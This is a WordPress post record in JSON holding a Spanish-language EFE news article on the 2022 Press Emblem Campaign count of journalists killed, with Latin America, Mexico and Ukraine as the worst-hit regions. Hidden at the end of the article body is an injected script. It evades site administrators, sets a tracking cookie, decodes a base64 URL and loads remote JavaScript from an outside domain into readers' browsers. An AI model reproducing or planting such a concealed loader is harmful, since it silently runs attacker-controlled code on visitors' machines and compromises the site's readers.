{"id":13080,"date":"2023-01-05T10:12:41","date_gmt":"2023-01-05T14:12:41","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13080"},"modified":"2023-01-05T10:12:41","modified_gmt":"2023-01-05T14:12:41","slug":"america-latina-fue-la-region-con-mas-asesinatos-a-periodistas-en-2022","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13080","title":{"rendered":"Am\u00e9rica Latina fue la regi\u00f3n con m\u00e1s asesinatos a periodistas en 2022"},"content":{"rendered":"<p>Ginebra, (EFE).- Am\u00e9rica Latina fue la regi\u00f3n m\u00e1s peligrosa para los\u00a0<strong>periodistas<\/strong>\u00a0en 2022, seg\u00fan la ONG Campa\u00f1a Emblema de Prensa (PEC), que contabiliz\u00f3 en esos pa\u00edses 40 asesinatos de trabajadores de los medios de comunicaci\u00f3n, el 34 % de los que se produjeron en todo el mundo.<\/p>\n<p>De acuerdo con los datos anuales de PEC, que aboga por una mayor protecci\u00f3n para los profesionales de la informaci\u00f3n, M\u00e9xico fue el segundo pa\u00eds con m\u00e1s asesinatos en todo el mundo, 17, la mayor\u00eda objetivos de bandas criminales en un clima de \u201cviolencia e impunidad\u201d.<\/p>\n<div id=\"\" class=\"mmc_ads \"><\/div>\n<p>Con nueve asesinatos, Hait\u00ed fue el tercer pa\u00eds del mundo con m\u00e1s v\u00edctimas.<\/p>\n<p>En el resto de la regi\u00f3n latinoamericana tambi\u00e9n hubo asesinatos de periodistas en Colombia (4), Honduras (3), Brasil y Ecuador (2 en cada uno), Chile, Guatemala y Paraguay (uno en cada uno).<\/p>\n<p>116 PERIODISTAS ASESINADOS EN 2022<\/p>\n<p>A nivel global, 116 trabajadores de los medios de comunicaci\u00f3n fueron asesinados en 29 pa\u00edses distintos, un 46 % m\u00e1s que en 2021 y el dato m\u00e1s elevado desde 2018, seg\u00fan los datos de PEC, que record\u00f3 que en la \u00faltima d\u00e9cada han sido asesinados 1.107 periodistas, una media de m\u00e1s de dos a la semana.<\/p>\n<p>Ucrania fue el pa\u00eds m\u00e1s peligroso para los profesionales de los medios de comunicaci\u00f3n en 2022, con 34 periodistas asesinados, aunque en esta estad\u00edstica se incluyen 14 que perdieron la vida como combatientes del ej\u00e9rcito ucraniano (otros 12 fallecieron en bombardeos).<\/p>\n<p>La mayor\u00eda de los que murieron en Ucrania eran periodistas locales, pero tambi\u00e9n fueron asesinados ocho extranjeros, entre ellos tres de nacionalidad rusa.<\/p>\n<p>El presidente de PEC, Blaise Lempen, destac\u00f3 hace unas semanas el \u00abdeterioro brutal\u00bb de la situaci\u00f3n para los periodistas en Europa -la peor en el continente desde las guerras yugoslavas-, en gran medida por culpa del estallido de la guerra.<\/p>\n<p>PEC conden\u00f3 todos los ataques y pidi\u00f3 que los responsables de estos cr\u00edmenes sean llevados ante la justicia de manera inmediata.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ginebra, (EFE).- Am\u00e9rica Latina fue la regi\u00f3n m\u00e1s peligrosa para los\u00a0periodistas\u00a0en 2022, seg\u00fan la ONG Campa\u00f1a Emblema de Prensa (PEC), que contabiliz\u00f3 en esos pa\u00edses 40 asesinatos de trabajadores de los medios de comunicaci\u00f3n, el 34 % de los que se produjeron en todo el mundo. De acuerdo con los datos anuales de PEC, que [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13082,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13080","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13080","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13080"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13080\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13082"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13080"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13080"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13080"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}